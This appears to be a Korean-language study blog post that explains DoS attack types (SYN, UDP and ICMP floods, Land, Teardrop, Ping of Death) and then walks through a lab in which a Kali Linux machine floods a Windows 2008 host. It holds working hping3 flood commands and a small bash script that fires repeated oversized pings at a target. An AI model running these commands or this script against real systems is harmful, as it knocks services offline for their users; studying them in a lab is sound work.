Dos(Denial of Service) Attack Type

Dos(Denial of Service) Attack Type

- Flood Attack

- Software Attack

 

> SYN Flood

> UDP Flood

> ICMP Flood

> Land Attack

> Teardrop Attack

 

Flood Attack

> TCP SYN Flood : 공격자 IP를 spoofing 하고 half-open TCP 연결을 시도하여 상대 호스트의 Listening Queue를 고갈 시키는 방법.

> UDP Flood Attack : UDP body에 쓰레기 데이터를 패딩하여 공격하는 방법.

> ICMP Smurfing Attack : ICMP 프로토콜과 IP 브로드캐스트 주소를 이용한 공격방법

> ICMP Flood Attack

 

Software Attack

- Ping of Death : ping 명령어를 이용하여 ICMP 패킷을 비정상적으로 크게 만들어 공격하는 방법.

- TearDrop : 패킷을 겹치거나 또는 일정한 간격에 빠지게 전송하는 공격하는 방법( 주로 동일한 offset을 사용)

 

다른 방식으로 Dos/DDos 구분하는 방법

- Volume Based Attack

> UDP Flood, ICMP Flood, Spoofed packet-based flood

- Protocol Attack

> SYN Flood, Ping of Death, Smurf, Teardrop. Fragemented pacekt 등

- Application Layer Attack

> HTTP Flood, Slowloris Attack

- Session Exhaustion

 

SYN Flood Attack

> 의도적으로 서버의 SYN 응답을 확인하지 않고 TCP SYN 세그먼트 ㄱㄱ.

> This kind of attack is usually originated by a sppfedc source IP address making it harder to track down the attacker

ICMP Flood Attack
> Similar to the Syn Flood attack, an ICMP flood takes place when ac attacker overloads its victim with a huge number of ICMP echo requests with spoofed source IP addresses.

>방어의 가장 간단한 방법은 신뢰할 수 없는 인터페이스에서 ICMP를 완전히 비활성화 하는 것이었고 더 복잡한 방법은 ICMP요청의 정책화 하고 침입의 경우 속도를 제한하는 것.

 

UDP Flood Attack

> UDP flooding doesn't differ from ICMP flooding.

> The only difference in this case is the fact that the IP packets that the attacker uses against its victim contain UDP datagrams of different sizes.

 

Land Attack

> When the attacker initiates a SYN Flood attack using the IP address of the victim as source and destination IP address, then it is said that the attacker has launcheda "Land attack"

 

Teardrop Attack

> This type of attack deals with fragmentation and reassembly of IP packets.

> The IP header contains the necessary fields to handle fragmentation issues.

> Basically there are three fields within an IP datagram related to fragmentation and reassembly

Do not fragment bit

More fragments bit

Fragment Offset

 

The Fragment Offset field, which is the crucial field in our case, is used to indicate the starting position of each fragment relative to the original unfragmented packet. An attacker could start transmitting fragmented IP packets containing overlapped Fragment Offsets making the victim unable to reassemble them exhausting the victim's resources and possibly crashing it.

 

The PING of Death

> There is a specific ICMP echo variation that could cause a system crash. The difference of the echo request from the normal ones is thelarge size of IP packet it contains. RFC 791 specifies that the maximum size of an IP packet is 65,535 bytes. An ICMP echo request with more than 65,507 (65,535-20-8) bytes of data could cause a remote system to crash while reassembling the packet fragments.

[여기 까지 원문]

https://www.pluralsight.com/blog/it-ops/ping-of-death-and-dos-attacks

 

ICMP LAND(Local Area Network Denial) Attack (ex: ping of death)

> ICMP 메세지를 시스템, 서버, 전송 장비에게 대량으로 전송하여 네트워크 및 시스템 부하를 발생시키는 공격.

 

Note : Junos OS supports land attack protection for both IPv4 and IPv6 packets.

 

- 사용 시스템

> win2008    (Victim System)

> KaliLinux    (Attack System)

 

( Win2008 )

작업 관리자를 실행 하여 네트워크 모니터

wireshark를 실행하여 패킷 모니터링

 

( Kali Linux )

# gnome-system-monitor &

 

타겟 시스템 확인

# hping3 -S 192.168.20.201 -p 80 -c 3

 

Flooding attack 수행

# hping3 -1 192.168.20.201 --flood -d 20

-1 > ICMP Mode

--flood > flooding attack

-p > port number

-d > data size

 

( Win2008 )

모니터링

 

(주의) 공격자 시스템에도 부하량이 걸린다.

 

(간단한 툴) ping.sh

 

#!/bin/bash
 
if [ $# -ne 2 ] ; then
    echo "Usage: $0 <Target IP> <MAXCOUNT>"
    exit 1
fi
 
IP=$1
MAX=$2
DATASIZE=60000
 
for i in `seq 1 $MAX`
do
    ping -s $DATASIZE $IP > /dev/null 2>&1 &
    sleep 5 
done
 
sleep 86400

 

 

Application Layer Attack 간단한 설명

https://www.cloudbric.com/blog/2015/03/application-level-attacks/